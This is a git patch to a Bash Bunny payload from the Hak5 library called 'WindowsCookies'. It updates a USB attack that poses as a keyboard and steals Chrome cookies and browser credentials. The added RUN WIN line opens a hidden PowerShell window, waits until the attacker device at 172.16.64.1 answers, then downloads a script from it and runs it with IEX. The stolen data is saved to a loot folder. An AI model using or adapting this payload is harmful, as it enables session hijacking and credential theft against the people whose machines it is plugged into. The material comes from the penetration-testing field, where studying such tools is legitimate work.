From e0ed65ad9b58a45a26c1b23d2ec8a7bcb9365e86 Mon Sep 17 00:00:00 2001
From: Darren Kitchen <darren@hak5.org>
Date: Fri, 7 Apr 2017 16:56:17 +1000
Subject: [PATCH] Updated WindowsCookies payload for Bash Bunny v1.1

---
 payloads/library/WindowsCookies/payload.txt | 23 ++++++++-------------
 1 file changed, 9 insertions(+), 14 deletions(-)

diff --git a/payloads/library/WindowsCookies/payload.txt b/payloads/library/WindowsCookies/payload.txt
index d87ad3e2..085416a9 100644
--- a/payloads/library/WindowsCookies/payload.txt
+++ b/payloads/library/WindowsCookies/payload.txt
@@ -10,33 +10,28 @@
 # https://github.com/sekirkity/BrowserGather BrowserGather.ps1
 # https://github.com/EmpireProject/Empire    Get-FoxDump.ps1
 # Also credit to illwill for the BrowerCreds payload
-
-#script 
+#
+# LED States 
+# Setup.............Setup
 # Blue..............Running Script
 # White.............Setup RNDIS_ETHERNET
 # Green.............Got Browser Creds
-LED B 200
-source bunny_helpers.sh
 
-# QUACK SET_LANGUAGE gb
-DUCKY_LANG='fr'
 
+LED SETUP
 LOOTDIR=/root/udisk/loot/FacebookSession
 mkdir -p $LOOTDIR
-
 ATTACKMODE HID
-
+LED STAGE1
+GET SWITCH_POSITION
 cd /root/udisk/payloads/$SWITCH_POSITION/
 ./server.py &
 sleep 1
 
 #Dump Chrome Cookies
-Q GUI r
-Q DELAY 100
-Q STRING "powershell -WindowStyle Hidden \"while(\$true){If(Test-Connection 172.16.64.1 -count 1 -quiet){sleep 2;IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1:8080/p'); Payload; exit}}\""
-Q ENTER
+RUN WIN "powershell -WindowStyle Hidden \"while(\$true){If(Test-Connection 172.16.64.1 -count 1 -quiet){sleep 2;IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1:8080/p'); Payload; exit}}\""
 
-LED R G B 100
+LED STAGE2
 ATTACKMODE RNDIS_ETHERNET
 
-LED G 100 
+LED FINISH